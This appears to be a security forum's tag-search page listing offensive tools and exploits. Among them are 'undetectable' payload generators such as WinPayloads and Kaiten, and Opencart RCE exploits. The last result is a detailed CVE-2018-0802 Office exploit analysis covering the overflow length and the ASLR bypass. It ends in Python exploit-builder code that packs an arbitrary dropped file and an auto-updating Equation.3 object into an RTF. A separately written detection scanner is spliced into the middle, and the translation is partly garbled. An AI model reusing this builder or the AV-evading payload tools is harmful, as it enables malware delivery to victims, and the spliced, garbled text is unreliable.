Showing results for tags 'generation'.

Found 18 results

  1. Web3 is a new generation of the Internet, which is used by, for example, cryptocurrency users. However, most Internet users are unaware that the web revolution is already underway, just as the transition from Web 1.0 to Web 2.0 was hardly noticeable. As William Gibson, the father of cyberpunk, said, the future is now, just unevenly distributed.

     Web 3.0 - what is it?

     Web 3 is, very broadly speaking, a decentralized Internet based on blockchain technology. In practice, it means, for example, transactions and financial services made online without intermediaries. That is not everything. The next generation of networks is to use machine learning and artificial intelligence (AI) in unprecedented ways to create online services. As a result, applications and websites will be created that are ideally suited to the needs of the user.

     How does Web 3.0 work?

     Web3 works in a decentralized way. What does that mean? A decentralized network uses a P2P (peer-to-peer) infrastructure, i.e. a network of related devices without a single dominant node. This solution is meant to guarantee the lack of control, greater transparency and security of user data. Blockchains play a key role in Web3. These are distributed databases that record changes in the system. They are the basis for creating more and more applications and for cryptocurrency trading. Another branch of Web3 is personalized information and services provided to users. This is due to increasingly advanced machine learning and AI techniques as well as the developed semantic network, which guarantees very precise search results.

     History of the web - from Web 1 to Web 3.0

     How did the network evolve and what were its next generations? How is Web 3.0 different from Web 2.0?

     Web 1.0

     This is the first version of the World Wide Web (the term was proposed in 1989 by the British scientist Tim Berners-Lee). It lasted until around 2005. Web1 is the time of static HTML pages, decentralized services (e.g. Yahoo) and search engines (Netscape Navigator, Mosaic). The use of Web 1.0 was passive: Internet users could only read and watch content posted on websites. Interaction between users was limited to discussion forums and messengers, which were very primitive compared to Messenger.

     Web 2.0

     Passive content consumption has been replaced by the ability to interact with the pages you visit. Users exchange content and create it themselves. Intermediaries are social media, blogs, network services. A few years ago, Web2 reached its highest level of development. It is a network that we know very well, dominated by digital giants: Google, Facebook, Amazon, Apple. The power of these global corporations has become so great that politicians decided to introduce regulations regarding, among other things, the collecting and trading of user data (solutions proposed, for example, by the European Union).

     Web 3.0

     Web3, in the words of Gavin Wood, is a "decentralized blockchain-based internet ecosystem." This is an epoch in the history of the World Wide Web that is just beginning. The best-known characteristic elements of Web 3.0 are blockchain technology, cryptocurrencies and NFTs (non-fungible tokens). The next revolution on the Internet is the answer to the powerful Big Tech. Thanks to Web 3.0, network users will regain control over their data and will be able to operate on the Internet without intermediaries (e.g. banks or large Internet services). Interestingly, not everyone is enthusiastic about the concept of Web3. For example, Elon Musk believes that Web 3 is just a marketing slogan.
  2. During bug bounties, penetration tests, red team exercises, and other great activities, there is always a moment when you need to launch amass, subfinder, sublister, or any other tool to find subdomains you can use to break through - like test.google.com, dev.admin.paypal.com or staging.ceo.twitter.com. Within this repository, you will be able to find the answers to the following questions:
       • What are the most popular subdomains?
       • What are the most common words in multilevel subdomains on different levels?
       • What are the most used words in subdomains?
  3. Agartha { LFI | RCE | Auth | SQLi | Http-Js }

     Agartha is a penetration testing tool that creates dynamic payload lists and a user access matrix to reveal injection flaws and authentication/authorization issues. There are many different attack payloads that exist, but Agartha creates run-time, systematic, and vendor-neutral payloads with many different possibilities and bypassing methods. It also draws attention to user session and URL relationships, which makes it easy to find user access violations. Additionally, it converts Http requests to JavaScript to help dig up XSS issues.

     In summary:
       • Payload Generator: It creates payloads/wordlists for different attacks.
         • Directory Traversal/Local File Inclusion: It creates file dictionary lists with various encoding and escaping characters.
         • Remote Code Execution: It creates command dictionary lists for both Unix and Windows environments with different combinations.
         • SQL Injection: It creates Batched Queries, Boolean-Based, Union-Based and Time-Based SQLi wordlists for various databases to help find vulnerable spots.
       • Authorization Matrix: It creates an access role matrix based on user sessions and URL lists to determine authorization/authentication-related access violation issues.
       • Http Request to JavaScript Converter: It converts Http requests to JavaScript code to be useful for further XSS exploitation and more.
  4. HatVenom

     HatVenom is the HatSploit-native powerful payload generation and shellcode injection tool that provides support for common platforms and architectures.

     Features
       • Support for most common executable formats like elf, macho, pe.
       • Support for most common architectures like x64, x86, aarch64, armle, mipsle, mipsbe.
       • Ability to modify shellcode by changing pre-defined offsets.

     Basic functions

     These are all the HatVenom basic functions that can be used to generate a payload, convert data, or inject shellcode.
       • ip_bytes(ip) – Converts an IP address to bytes allowed by the shellcode.
       • port_bytes(port) – Converts a numeric port to bytes allowed by the shellcode.
       • string_bytes(string) – Converts a string to bytes allowed by the shellcode.
       • generate(file_format, arch, shellcode, offsets={}) – Generates a payload for the specified target and with the specified shellcode.
       • generate_to(file_format, arch, shellcode, offsets={}, filename='a.out') – Generates a payload for the specified target and with the specified shellcode and saves it to the specified file.
  5. WhatWeb identifies websites. Its goal is to answer the question, "What is that Website?". It recognizes web technologies including content management systems (CMS), blogging platforms, statistic/analytics packages, JavaScript libraries, web servers, and embedded devices. WhatWeb has over 1700 plugins, each to recognize something different. WhatWeb also identifies version numbers, email addresses, account IDs, web framework modules, SQL errors, and more.

     WhatWeb can be stealthy and fast, or thorough but slow. WhatWeb supports an aggression level to control the tradeoff between speed and reliability. When you visit a website in your browser, the transaction includes many hints of what web technologies are powering that website. Sometimes a single webpage visit contains enough information to identify a website, but when it does not, WhatWeb can interrogate the website further. The default level of aggression, called 'stealthy', is the fastest and requires only one HTTP request of a website. This is suitable for scanning public websites. More aggressive modes were developed for use in penetration tests.

     Most WhatWeb plugins are thorough and recognize a range of cues from subtle to obvious. For example, most WordPress websites can be identified by the meta HTML tag, e.g. '<meta name="generator" content="WordPress 2.6.5">', but a minority of WordPress websites remove this identifying tag; this does not thwart WhatWeb. The WordPress WhatWeb plugin has over 15 tests, which include checking the favicon, default installation files, login pages, and checking for "/wp-content/" within relative links.

     Features:
       • Over 1800 plugins
       • Control the trade-off between speed/stealth and reliability
       • Performance tuning. Control how many websites to scan concurrently.
       • Multiple log formats: Brief (greppable), Verbose (human readable), XML, JSON, MagicTree, RubyObject, MongoDB, ElasticSearch, SQL.
       • Proxy support including TOR
       • Custom HTTP headers
       • Basic HTTP authentication
       • Control over webpage redirection
       • IP address ranges
       • Fuzzy matching
       • Result certainty awareness
       • Custom plugins defined on the command line
       • IDN (International Domain Name) support

     Changelog v0.5.5

     FIXES
       • #358 Fixed escape_for_sql method (@juananpe)

     NEW PLUGINS
       • Apache Flink (@juananpe)
       • Dell-OpenManage-Switch-Administrator (@themaxdavitt)
       • FLIR AX8 (@urbanadventurer)
       • Huginn (@urbanadventurer)
       • OpenResty (@urbanadventurer)
       • Telerik UI (@definity)
       • Umbraco (@definity / @ChadBrigance)
       • VMware Horizon (@themaxdavitt)

     PLUGIN UPDATES
       • Joomla (@juananpe)
       • phpMyAdmin (@juananpe)
       • Microsoft IIS (@themaxdavitt)
  6. WhatWeb identifies websites. Its goal is to answer the question, "What is that Website?".

     Changelog v0.5.4

     This is a minor release with three new plugins ✨, and one plugin update 🔨.

     🔧 FIXES
       • #345 Fixed colour output problem with white text being invisible when users have a white terminal background (@urbanadventurer)
       • #347 Fixed MongoDB compatibility logging issue (@juananpe)

     NEW PLUGINS
       • BlockScout (@urbanadventurer)
       • ElasticSearch (@urbanadventurer)
       • Grafana (@urbanadventurer)

     PLUGIN UPDATES
       • Kibana (@urbanadventurer)
  7. WhatWeb identifies websites. Its goal is to answer the question, "What is that Website?".

     Changelog v0.5.3

     This is a minor release with miscellaneous changes ✨, seven new plugins 🚀, and two plugin updates ⚙️.

     🔧 MISC
       • #319 MongoDB logging now uses upsert (update by default, insert if new) (@juananpe)
       • #314 Makefile now supports the PREFIX environment variable (@bfontaine)

     NEW PLUGINS
       • Adobe Experience Manager (AEM) (@definity)
       • JFrog Artifactory (@bcoles)
       • Matomo (@urbanadventurer)
       • MobileIron-MDM (@bcoles)
       • Slack-Workspace (@bcoles)
       • Wobserver (@urbanadventurer)
       • Zoom (@bcoles)

     PLUGIN UPDATES
       • Magento (@huntertl)
       • phpMyAdmin (@juananpe)
  8. WhatWeb identifies websites. Its goal is to answer the question, "What is that Website?".

     Changelog v0.5.2

     🔧 This is a minor update with 🐞 bug fixes, and one ✨ new plugin, PHP-Slim.

     FIXES
       • #299 Fixed the "warning: URI.escape is obsolete" error by using the Addressable gem. Thanks @weidsom (Weidsom Nascimento)
       • #306, #307 Improvements to Makefile. @xambroz
       • #304 Log level for mongodb-logger is set to "FATAL", unless WhatWeb is run with debug mode enabled. @helsecert

     NEW PLUGINS
       • PHP-Slim, Marcelo Gimenes (@cgimenes)
  9. Kaiten - An Undetectable Payload Generation tool

     This tool is for educational purposes only; usage of Kaiten for attacking targets without prior mutual consent is illegal. Developers assume no liability and are not responsible for any misuse or damage caused by this program.

     Requirements
       • MingW (64 & 32)
       • GCC
       • OSSLSIGNCODE

     Features
       • Undetectable Payload Generation
       • Stealth FUD Payload
       • Self Signing Certificate
       • Random Junk code

     Affected Devices and Operating Systems
       • Windows
       • Android (soon)
       • Mac/Linux
  10. Burp Extension features

      When you generate your plugin project, the generator will ask you what features should be included in your plugin. If you are familiar with Burp extension development, the names of the features will be descriptive enough, but if you are new to Burp extensions, here is a short description of what can be done with each feature.

      Extension Tab GUI: A custom tab that will be added to Burp's UI. It is normally used to add some functionality (like the Logger++ extension) or just to enable the user to configure the extension.

      Context menu GUI: A custom context menu that will be added to Burp's UI nearly anywhere, by pressing right click. Burp allows showing context menus in any of these situations:
        • Intruder attack results.
        • Intruder payload positions editor.
        • Request editor.
        • Response editor.
        • Non-editable request viewer.
        • Non-editable response viewer.
        • Proxy history.
        • Scanner results.
        • Search results window.
        • Target site map table.
        • Target site map tree.
  11. #1 Email Opt-In & Lead Generation Plugin. Guaranteed Increase in Subscribers & Conversions!
  12. WinPayloads - Undetectable Windows Payload Generation

      Winpayloads is a payload generator tool that uses Metasploit's meterpreter shellcode, injects the user's IP and port into the shellcode and writes a Python file that executes the shellcode using ctypes. This is then AES encrypted and compiled to a Windows executable using PyInstaller.

      Features:
        • Undetectable Windows Payload Generation
        • Easy to Use GUI
        • Upload Payload to Local WebServer
        • Psexec Payload to Target Machine
        • Automatically Runs Metasploit Listener with Correct Settings after Payload Generated

      Winpayloads also comes with a few features such as UAC bypass and payload persistence. These are PowerShell files that execute on the system when the meterpreter gets a reverse shell. The UAC bypass is written by PowerShellEmpire and uses an exploit to bypass UAC on local administrator accounts and creates a reverse meterpreter running as local administrator back to the attacker's machine. Winpayloads can also set up a SimpleHTTPServer to put the payload on the network to allow downloading on the target machine, and also has a psexec feature that will execute the payload on the target machine if supplied with usernames, domain, passwords or hashes.

      psexec.py - impacket example
  13. Opencart versions 3.0.3.2 and below insecure OCMod generation pre-authentication remote code execution exploit.
  14. Opencart versions 2.3.0.2 and below suffer from an insecure OCMod generation remote command execution vulnerability.
  15. About WhatWeb

      WhatWeb identifies websites. Its goal is to answer the question, "What is that Website?". WhatWeb recognises web technologies including content management systems (CMS), blogging platforms, statistic/analytics packages, JavaScript libraries, web servers, and embedded devices. WhatWeb has over 1800 plugins, each to recognise something different. WhatWeb also identifies version numbers, email addresses, account IDs, web framework modules, SQL errors, and more.

      WhatWeb can be stealthy and fast, or thorough but slow. WhatWeb supports an aggression level to control the trade off between speed and reliability. When you visit a website in your browser, the transaction includes many hints of what web technologies are powering that website. Sometimes a single webpage visit contains enough information to identify a website, but when it does not, WhatWeb can interrogate the website further. The default level of aggression, called 'stealthy', is the fastest and requires only one HTTP request of a website. This is suitable for scanning public websites. More aggressive modes were developed for use in penetration tests.

      Most WhatWeb plugins are thorough and recognise a range of cues from subtle to obvious. For example, most WordPress websites can be identified by the meta HTML tag, e.g. '<meta name="generator" content="WordPress 2.6.5">', but a minority of WordPress websites remove this identifying tag; this does not thwart WhatWeb. The WordPress WhatWeb plugin has over 15 tests, which include checking the favicon, default installation files, login pages, and checking for "/wp-content/" within relative links.

      Features
        • Over 1800 plugins
        • Control the trade off between speed/stealth and reliability
        • Performance tuning. Control how many websites to scan concurrently.
        • Multiple log formats: Brief (greppable), Verbose (human readable), XML, JSON, MagicTree, RubyObject, MongoDB, ElasticSearch, SQL.
        • Proxy support including TOR
        • Custom HTTP headers
        • Basic HTTP authentication
        • Control over webpage redirection
        • IP address ranges
        • Fuzzy matching
        • Result certainty awareness
        • Custom plugins defined on the command line
        • IDN (International Domain Name) support
  16. Introduction

      The increased use of PowerShell attacks has led to the fact that they are much better logged and detected today. Yes, PowerShell is flexible, but we needed urgent alternatives. Everyone started to turn to C# and the .NET utilities to execute code on Windows. That's how SharpShooter, a payload generation framework, came out. SharpShooter is a weaponised payload generation framework with anti-sandbox analysis, staged and stageless payload execution and support for evading ingress monitoring.

      Updated with new features
  17. Introduction

      The Microsoft Security Patch of January 2018 fixes the Office 0day vulnerability (CVE-2018-0802) captured by the 360 Core Security Advanced Threat Response Team. This vulnerability affects almost all versions of Office that Microsoft currently supports. This is the second outbreak of high-level threats using zero-day loopholes since 360's first global interception of the Office 0day vulnerability (CVE-2017-11826). The 360 core security team has been actively communicating with Microsoft and working together to promote the repair of the 0day loophole so that the vulnerability could be properly resolved before disclosure of the vulnerability information. The technical principle of the vulnerability is similar to the 17-year-old "Dream Formula" loophole (CVE-2017-11882). It is a re-initiated attack by the hacker using EQNEDT32.EXE, the equation editor embedded in Office. We call it "Nightmare Formula II" (CVE-2018-0802).

      Attack process analysis

      We captured several in-the-wild attacks of "Dream Formula II". The in-the-wild samples were embedded with two formula objects, using the Nday and 0day loopholes. The Nday loophole can attack unpatched systems, while the 0day loophole attacks fully patched systems: it bypasses the ASLR (Address Randomization) security measure of the CVE-2017-11882 patch, and the attack will eventually implant a malicious remote control program on the user's computer.

      Figure: "Dream Formula II" in-the-wild sample attack process

      Vulnerability analysis

      "Dream Formula II" is a patch bypass vulnerability of CVE-2017-11882. The type is stack overflow. The root cause is that Microsoft's "Dream Formula Generation" patch does not fix the stack overflow in the copy of the font FaceName. This vulnerability will only cause a crash on an unpatched version, but it can be perfectly exploited on a patched version. Below we analyze the CVE-2018-0802 vulnerability using PoC samples.

      Static analysis

      As with CVE-2017-11882, the trigger data for this vulnerability is within the "Equation Native" stream of the extracted OLE object. The red-circled portion in Figure 1 is the core data, with a total of 0x99 = 153 bytes. 0x08 represents the font tag, the following 00 01 represent the typeface and style of the font respectively, and the area from 33 to 25 00 is the name of the font, which is the data copied when the stack overflows. This part of the data contains shellcode, ASLR bypass tricks, process command lines, and related padding data. We will analyze them later.

      Figure 1

      Equation Native data structure

      According to information published online, the entire "EquationNative" data structure is: MTEFData = MTEF header + MTEF Byte Stream. The structure of EQNOLEFILEHDR is shown in Figure 2.

      Figure 2

      The structure of the MTEF header is shown in Table 1. Regarding this structure, there are differences between the actual data and the format specifications that we observed. The following table shows the actual observations:

      Offset  Description                         Value
      0       MTEF version number                 0x03
      1       Platform that generated the data    0x00: generated on Macintosh platform, 0x01: generated on Windows platform
      2       Product that generated the data     0x00: generated by MathType, 0x01: generated by Equation Editor
      3       Product major version number        0x03
      4       Product minor version number        0x0A

      Table 1

      In the attack sample, the MTEF ByteStream structure is shown in Table 2:

      Initial SIZE record | FONT record | FONT content | Remaining data

      Table 2

      The FONT record and FONT content structure are shown in Table 3:

      Member  Description       Note
      Tag     0x08              1 byte
      Tface   Typeface number   1 byte
      Style   Font style        1 byte
      Name    Font name         NULL-terminated ASCII string

      Table 3

      Patch bypass analysis

      The CVE-2018-0802 vulnerability trigger point is located in sub_21E39 (the module base address is set to 0 in IDA), as shown in Figure 3. It can be seen that the purpose of the function is to initialize a LOGFONT structure according to the font data in the formula.

      Figure 3

      Let's take a look at Microsoft's description of the LOGFONT structure (Figure 4). You can see that the last member of this structure is lfFaceName.

      Figure 4: LOGFONT Structure

      Let's take another look at Microsoft's description of the lfFaceName member (Figure 5). You can see that lfFaceName represents the typeface name of the font. On the version being analyzed, it is a null-terminated char string with a maximum length of 32, which includes the terminating NULL.

      Figure 5

      The problem is obvious: the code in the red box in Figure 3 does not limit the copy length when copying the font FaceName; the source data for the copy is the user-supplied font name, and the destination address is a LOGFONT structure address passed in from the parent function. Looking back at the parent function of sub_21E39 (Figure 6), you can see that this address is located on the stack frame opened by the parent function, i.e. it is a local variable of the parent function. The attacker constructs malicious data, overwrites the last two bytes of the return address of the parent function (sub_21774), and then directs the control flow to the shellcode on the stack.

      Figure 6

      During the analysis, we found a place of suspected recursion. Figure 7 shows the disassembly code of sub_21774. We can see that sub_21774 first calls the vulnerable function sub_21E39 to initialize a LOGFONT structure, and then calls the relevant API, passing in the structure; the system returns a font name that is saved to Name. Then it compares the obtained Name with the user-supplied lpLogFont. If they are inconsistent (and the sub_115A7 function needs to return False), it will call itself, or not, according to the condition specified by a3, where a3 is the third parameter of the sub_21E39 function.

      Figure 7

      Let's take a look at the third parameter; otherwise there may be multiple recursions and this overflow cannot be used effectively. According to the previous CVE-2017-11882 debugging results (Figure 8), we can see that when parsing the user-supplied font data, the function calling sub_21774 is sub_214C6. Looking back at sub_214C6 (Figure 9), sub_214C6 calls sub_21774 passing a value of 1 as the third parameter, so if(a3) in Figure 7 is true. Looking at Figure 7 again, when sub_21774 recursively calls itself, the value passed as the 3rd parameter is 0, which means that sub_21774 will not call itself again, and the recursion will only have 1 level. With this analyzed, the recursion doubts have been resolved.

      Figure 8: CVE-2017-11882 Triggered Execution Flow

      Figure 9

      One problem analyzed here is that if _strcmpi(lpLogfont, &Name) is not true (if the font data is forged by the user, it certainly does not hold here), sub_115A7 will be called, which means that it will go to the CVE-2017-11882 overflow point. In the version without the November patch, if you want to successfully use CVE-2017-11882, the CVE-2018-0802 point will not overflow, because the former needs a much smaller overflow size than the latter, and the copy ends with a NULL truncation (we know that controlling eip by overflowing CVE-2017-11882 requires only 0x2C bytes, and through the analysis below (Figure 11) we can see that controlling eip by overflowing CVE-2018-0802 requires 0x94 bytes). On the other hand, if you want to trigger CVE-2018-0802 on a version that does not have the November patch, CVE-2017-11882 will be triggered first. In short, CVE-2018-0802 is not usable on the pre-November-patch version. However, as can be seen from Figure 10, in the November patch, before the copy at the CVE-2017-11882 overflow point, Microsoft imposed a length limit of 0x20 on the copy length, and after the copy was completed, a NULL was manually added at the end of the copied data to invalidate CVE-2017-11882. This directly leads to CVE-2018-0802 being unusable before patching! Now, as long as sub_115A7 returns False, the vulnerability can be perfectly exploited, and actual debugging finds that sub_115A7 does return False.

      Figure 10

      Dynamic analysis

      Overflow data copy

      With the above analysis, dynamic analysis becomes very simple. Since this overflow point copies the data, let's monitor the source string and the corresponding stack backtrace for each copy. We first enter the OLE data-related Load function (sub_6881), then set a breakpoint before the data copy, proceed, and output the result, which is shown in the log.

      It can be seen from the log that there are two copies, and we can tell from the stack backtrace that these two copies are the two calls to sub_21174 from the static analysis. The first is the call from sub_214c6 to sub_21174, and the second is the call from sub_21174 to itself. It can be seen that the stack overflow obviously occurs on the first copy. A small note here: cb ce cc e5 stands for Songs.

      Let us calculate in detail how much length we need to overflow to control the return address of the parent function (sub_21174). (The conclusion of this question has already been mentioned in the "Patch bypass analysis" section.) From Figure 11 we can see that overflowing from lfFaceName (-0x90) to ret_addr (+0x4) requires a total of 0x94 bytes. The bytes exceeding the 0x94 portion will cover the return address one by one from the low address.

      Figure 11

      We look at the data in the PoC. As shown in Figure 12, the blue part is the first 0x94 bytes of the overflow, 25 00 are the last two bytes of the overflow, and 00 is the terminator; when the copy encounters 00 it stops. According to the little-endian address layout, when the PoC is running, only the lower 2 bytes of EIP will be covered. Why do this? The answer is to bypass ASLR.

      Figure 12

      Bypass ASLR

      Let's take a look at why overwriting two bytes can bypass ASLR. First of all, we must be clear that the patched file has ASLR enabled, as shown in Figure 13. As a result, the base address for loading EQNEDT32.EXE is random each time, so the first problem to be considered when overflowing is how to bypass ASLR. (As for DEP, you can see from Figure 14 that DEP is not enabled in EQNEDT32.EXE in the patched file, so it is not necessary to consider DEP under normal circumstances.) Unfortunately, attackers clearly understand the Windows system mechanisms and defenses. On the Windows platform, the ASLR of a 32-bit process only randomizes the upper 2 bytes of the address each time, while the lower 2 bytes remain unchanged. If a ret instruction can be found in the same low 0xFFFF space as the covered address, with the address of the form 0xABCD00XY (where ABCD and XY are 6 arbitrary hexadecimal digits; the second-to-last byte in the address must be 0x00, because the copy needs to be accurately truncated afterwards), you can directly use this ret to jump to the stack. Since there is no need to bypass DEP, shellcode can be executed directly on the stack.

      Figure 13: ASLR Status of EQNEDT32.EXE is Enabled and DEP is Non-Permanent DEP

      Figure 14: DEP Status of EQNEDT32.EXE is Disabled

      More unfortunately, within the EQNEDT32.EXE module, Microsoft really gave one, and only one, such address (Figure 15). There is only one address that satisfies the condition, namely 20025, whose two bytes 25 00 are covered into eip. It is unique; there is no second ret that satisfies the condition.

      Figure 15

      Let's consider what the original return address of sub_21174 is. Of course, it is the address of the next instruction after sub_214C6 calls sub_21174. It can be seen from Figure 16 that the offset of this address is 214E2. According to the overlay of Figure 12, the offset after the overlay becomes 20025, which is consistent with the above analysis and Fig.
17 As you can see, this address is a ret instruction.This instruction will pop up sub_214C6 to the first parameter of sub_21174 and switch the control flow to this value to execute.To make matters worse, this first parameter happens to be lpLogFont, which is the FontName provided by the user.So after ret is executed, the control flow will be transferred to the stack and it will just start executing the first byte of the user-supplied FontName. Figure 16 Figure 17 Sample A Shellcode Analysis In poc for sample A transformation, control flow hijacking and execution of the shellcode section are shown in Figure 18: Figure 18: Due to the existence of recursion, we need to return twice from the sub_21774 function, which explains the first two rets Immediately after the jmpeax instruction, WinExec is called, and the command line parameter happens to be calc.exe, as shown in Figure 19: Figure 19 Sample B Shellcode Analysis Sample B bypasses ASLR in the same way as Sample A, but the shellcode portion is not the same as Sample A.Sample B's shellcode finds the kernel32.dll export table (Figures 20 and 21) through the PEB, and then searches through the export table for a hash of the desired function through a specific hash algorithm (Figure 21). The hash value is given in shellcode.The shellcode then saves the searched function address to where the hash value was previously stored (Figure 22). Figure 20: Hash value and copy path name given in sample B's shellcode Figure 21: Finding the required function in the export table of kernel32.dll with the hash value Figure 22: Comparison of data on the stack before and after finding the function address After successfully finding the function and saving the address on the stack, first call the ExpandEnvironmentStringsA function to expand the short path (the short path is saved in the shellcode), and then call CopyFileA to copy the payload to the word plugin directory so that the payload will follow the word next time. 
Start automatically loaded into memory.Finally call ExitProcess to exit the Equation Editor process (Figure 23).The entire process does not affect the normal opening of the document. Figure 23: Expand the short path, copy the file, and exit the process to sum up The 0day vulnerabilities used by "CVE-2018-0802" are called CVE-2017-11882's twin vulnerabilities. One vulnerability in the attack sample is for unpatched systems, and the other is for vulnerabilities. The system uses two OLEs to attack at the same time. The hackers' well-constructed attacks are perfectly compatible with the different circumstances of the system vulnerability patch environment.The use of this loophole and the Bypass ASLR approach have a certain degree of coincidence, if there is no ret instruction in the EQNEDT32.EXE module can be used to bypass the ASLR, if lpLogFont is not the first parameter of sub_21774, if CVE - 2017-11882 patch repair method forced DEP protection, "Dream Formula II" will not have the opportunity. The latest 360 security products have been able to detect and prevent this zero-day vulnerability, and we recommend that users update the Microsoft Security Patch for January 2018. 
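A defender-side check built from the analysis above: a font name of 0x20 or more bytes cannot fit in lfFaceName, and one of 0x94 bytes reaches the return address of sub_21774. This is an added example, not code from the 360 report or from the PoC; the OLE1 header and MTEF fixtures it builds are constructed here, and the FONT-tag scan is a heuristic rather than a full MTEF record walker.

```python
import re
import struct

# Constructed fixtures: built here for the check below, not taken from the samples
# or the PoC discussed on the page.
MTEF_HEADER = bytes([0x03, 0x01, 0x01, 0x03, 0x0A])  # MTEF v3, Windows, Equation Editor 3.0
FONT_TAG = 0x08            # MTEF FONT record: tag, typeface, style, NUL-terminated name
LFFACENAME_SIZE = 0x20     # lfFaceName holds 32 bytes including the terminator (Figure 5)
RET_ADDR_DISTANCE = 0x94   # bytes from lfFaceName to the parent's return address (Figure 11)
EQN_HDR_SIZE = 0x1C        # EQNOLEFILEHDR that precedes the MTEF data in "Equation Native"
OBJDATA_RE = re.compile(r"\\\*\\objdata\s*([0-9A-Fa-f\s]+)")


def build_equation_objdata(font_name: bytes) -> bytes:
    """Wrap one MTEF FONT record in an EQNOLEFILEHDR and an OLE1 ObjectHeader
    (the same header layout the page's Package class emits). Test fixture only."""
    mtef = MTEF_HEADER + bytes([FONT_TAG, 0x00, 0x01]) + font_name + b"\x00"
    eqn_hdr = struct.pack("<HIHI16s", EQN_HDR_SIZE, 0x00020000, 0xC49E, len(mtef), b"\x00" * 16)
    native = eqn_hdr + mtef
    class_name = b"Equation.3\x00"
    return (struct.pack("<II", 0x00000501, 2)               # OLEVersion, FormatID = embedded
            + struct.pack("<I", len(class_name)) + class_name
            + struct.pack("<II", 0, 0)                        # empty TopicName and ItemName
            + struct.pack("<I", len(native)) + native)


def build_sample_rtf(font_name: bytes, auto_update: bool = True) -> str:
    """Minimal RTF carrying one Equation.3 object, optionally with \\objupdate."""
    upd = r"\objupdate" if auto_update else ""
    return (r"{\rtf1\ansi {\object\objemb" + upd + r"{\*\objclass Equation.3}"
            r"{\*\objdata " + build_equation_objdata(font_name).hex() + r"}}\par}")


def parse_ole1_header(blob: bytes):
    """Return (class_name, native_data) from an OLE1 ObjectHeader; raises struct.error
    when the blob is truncated."""
    _version, _format_id, cls_len = struct.unpack_from("<III", blob, 0)
    off = 12
    cls = blob[off:off + cls_len].rstrip(b"\x00").decode("ascii", "replace")
    off += cls_len
    topic_len, = struct.unpack_from("<I", blob, off)
    off += 4 + topic_len
    item_len, = struct.unpack_from("<I", blob, off)
    off += 4 + item_len
    data_len, = struct.unpack_from("<I", blob, off)
    return cls, blob[off + 4:off + 4 + data_len]


def longest_font_name(native: bytes):
    """Length of the longest NUL-terminated name behind a candidate FONT tag in the
    MTEF body. Heuristic: every 0x08 byte is treated as a FONT tag, since a faithful
    walk would need the layout of every MTEF record type."""
    if len(native) < EQN_HDR_SIZE or struct.unpack_from("<H", native, 0)[0] != EQN_HDR_SIZE:
        return None
    body = native[EQN_HDR_SIZE + len(MTEF_HEADER):]
    longest = 0
    for i, b in enumerate(body):
        if b == FONT_TAG:
            start = i + 3                      # skip tag, typeface, style
            nul = body.find(b"\x00", start)
            longest = max(longest, (len(body) if nul < 0 else nul) - start)
    return longest


def scan_rtf(text: str) -> list:
    """Report every embedded OLE object, flagging Packager drops and Equation.3
    objects whose font name cannot fit in lfFaceName."""
    findings = []
    for n, m in enumerate(OBJDATA_RE.finditer(text)):
        f = {"object": n}
        grp = text.rfind(r"{\object", 0, m.start())
        f["auto_update"] = grp >= 0 and r"\objupdate" in text[grp:m.start()]
        try:
            f["class"], native = parse_ole1_header(bytes.fromhex(re.sub(r"\s+", "", m.group(1))))
        except (ValueError, struct.error):
            f["issue"] = "objdata is not valid hex or the OLE1 header is malformed"
            findings.append(f)
            continue
        if f["class"] == "Package":
            f["issue"] = "Packager object can drop an embedded file"
        elif f["class"].startswith("Equation"):
            name_len = longest_font_name(native)
            f["font_name_len"] = name_len
            if name_len is not None and name_len >= LFFACENAME_SIZE:
                f["issue"] = "font name overruns lfFaceName"
                f["reaches_return_address"] = name_len >= RET_ADDR_DISTANCE
        findings.append(f)
    return findings
```

A real document's objdata wraps a compound file rather than the bare EQNOLEFILEHDR used in the fixture, so on live samples the "Equation Native" stream has to be extracted first; the length thresholds are the same.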
reference [Hidden Content]

Code (.py):

```python
# Python 2 PoC generator as posted (Python 2 str.encode('hex') and print statement).
# The long hex streams of the OLE object templates were removed from this listing.
import argparse
import os
import struct


class Package(object):
    """
    Packager spec based on: [Hidden Content]
    Dropping method by Haifei Li: [Hidden Content]
    Found being used itw by @MalwareParty: [Hidden Content]
    """

    def __init__(self, filename):
        self.filename = os.path.basename(filename)
        self.fakepath = 'C:\\fakepath\\{}'.format(self.filename)
        self.orgpath = self.fakepath
        self.datapath = self.fakepath
        with open(filename, 'rb') as f:
            self.data = f.read()
        self.OBJ_HEAD = r"{\object\objemb\objw1\objh1{\*\objclass Package}{\*\objdata "
        self.OBJ_TAIL = r"0105000000000000}}"

    def get_object_header(self):
        OLEVersion = '01050000'
        FormatID = '02000000'
        ClassName = 'Package'
        szClassName = struct.pack("<I", len(ClassName) + 1).encode('hex')
        szPackageData = struct.pack("<I", len(self.get_package_data())/2).encode('hex')
        return ''.join([
            OLEVersion,
            FormatID,
            szClassName,
            ClassName.encode('hex') + '00',
            '00000000',
            '00000000',
            szPackageData,
        ])

    def get_package_data(self):
        StreamHeader = '0200'
        Label = self.filename.encode('hex') + '00'
        OrgPath = self.orgpath.encode('hex') + '00'
        UType = '00000300'
        DataPath = self.datapath.encode('hex') + '00'
        DataPathLen = struct.pack("<I", len(self.datapath)+1).encode('hex')
        DataLen = struct.pack("<I", len(self.data)).encode('hex')
        Data = self.data.encode('hex')
        OrgPathWLen = struct.pack("<I", len(self.datapath)).encode('hex')
        OrgPathW = self.datapath.encode('utf-16le').encode('hex')
        LabelLen = struct.pack("<I", len(self.filename)).encode('hex')
        LabelW = self.filename.encode('utf-16le').encode('hex')
        DefPathWLen = struct.pack("<I", len(self.orgpath)).encode('hex')
        DefPathW = self.orgpath.encode('utf-16le').encode('hex')
        return ''.join([
            StreamHeader,
            Label,
            OrgPath,
            UType,
            DataPathLen,
            DataPath,
            DataLen,
            Data,
            OrgPathWLen,
            OrgPathW,
            LabelLen,
            LabelW,
            DefPathWLen,
            DefPathW,
        ])

    def build_package(self):
        return self.OBJ_HEAD + self.get_object_header() + self.get_package_data() + self.OBJ_TAIL


RTF_HEADER = R"""{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Calibri;}}
{\*\generator Riched20 6.3.9600}\viewkind4\uc1
\pard\sa200\sl276\slmult1\f0\fs22\lang9"""

RTF_TRAILER = R"""\par}
"""

OBJECT_HEADER = R"""{\object\objemb\objupdate{\*\objclass Equation.3}\objw380\objh260{\*\objdata """

# The \result picture (wmetafile8 hex) and the two objdata templates below were
# long hex streams in the original; they are omitted here.
OBJECT_TRAILER = R""" }{\result{\pict{\*\picprop}\wmetafile8\picw380\pich260\picwgoal380\pichgoal260
...
}}}
